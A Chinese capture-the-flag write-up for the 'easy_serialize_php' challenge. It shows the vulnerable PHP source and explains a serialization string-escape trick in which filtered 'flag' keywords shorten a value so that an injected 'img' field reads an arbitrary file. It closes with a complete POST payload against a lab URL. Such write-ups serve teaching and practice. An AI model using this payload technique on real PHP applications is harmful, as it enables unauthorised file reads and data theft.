[安洵杯 2019]easy_serialize_php
打开靶机,访问源码:
<?php
$function = @$_GET['f'];
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
} //过滤掉了php、flag、php5、php4、fl1g关键字
if($_SESSION){
unset($_SESSION);
}
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);
if(!$function){
echo '<a href="index.php?f=highlight_file">source_code</a>';
}
if(!$_GET['img_path']){ //img_path为空,对img赋值默认图片
$_SESSION['img'] = base64_encode('guest_img.png');
}else{ //img_path非空,获取图片路径进行base64和sha1编码
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION));
if($function == 'highlight_file'){
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}
根据提示访问:
/index.php?f=phpinfo
得到php相关配置信息:
这里的dog3_flag.php很有可能就是flag文件。
进行源码审计,逆向分析:
file_get_contents(base64_decode($userinfo['img']));
肯定要利用文件读取dog3_flag.php文件,这里只进行了base64解码,说明默认img为guest_img.png,如果指定img_path为dog3_flag.php会进行sha1加密,最后也获取不到文件内容。那么如何通过不指定img_path的值使得img的值为dog3_flag.php呢?继续审计代码。
$serialize_info = filter(serialize($_SESSION));
首先会对_SESSION进行序列化,然后进行关键字的过滤。
若SESSION参数:
$_SESSION["user"] = 'guestflagflagflagflag';
$_SESSION['function'] = 'aaaa';
$_SESSION['img']=base64_encode('guest_img.png');
序列化:
a:3:{s:4:"user";s:21:"guestflagflagflagflag";s:8:"function";s:4:"aaaa";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
经过filter关键字会过滤掉flag,于是序列化字段会变短,过滤后的结果:
a:3:{s:4:"user";s:21:"guest";s:8:"function";s:4:"aaaa";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
由于user字段值的长度仍为21,所有会往后吞21个字符,一直吞到guest";s:8:"function"
,那有没有一种可能我让function的值足够长能够包含我们指定为base64(dog3_flag.php)的img序列化的内容字段且被过滤掉关键字长度刚好能把img序列化字段吞进去,达到指定img赋值的效果?上栗子:
首先得让img序列包含在function中这样我们才能通过吞取赋值img的值,我们指定:
$_SESSION["user"] = 'guestflagflagflagflagflagflagflag';
$_SESSION['function'] = 'aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"ctf";s:6:"webctf";}';
在序列化SESSION得:
a:3:{s:4:"user";s:33:"guestflagflagflagflagflagflagflag";s:8:"function";s:69:"aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"ctf";s:6:"webctf";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
经过filter过滤的结果:
a:3:{s:4:"user";s:33:"guest";s:8:"function";s:69:"aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"ctf";s:6:"webctf";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
由于替换了7个flag关键字,会往后吞28个字符串,刚好将guest";s:8:"function";s:69:"aaaaa
赋给了user,后面构造img变量,后面是随便添加的一个变量,刚好满足三个变量,反序列化读取到webctf就结束了,后面的img被丢掉了。这样就完成了img的赋值。
playload:
http://272ed79b-77e4-46d7-92a3-b723c4013aa6.node4.buuoj.cn:81/index.php?f=show_image
POST:_SESSION[user]=guestflagflagflagflagflagflagflag&_SESSION[function]=aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"ctf";s:6:"webctf";}
提示flag在/d0g3_fllllllag文件中
/d0g3_fllllllag的Base64编码为L2QwZzNfZmxsbGxsbGFn,更改img为L2QwZzNfZmxsbGxsbGFn,访问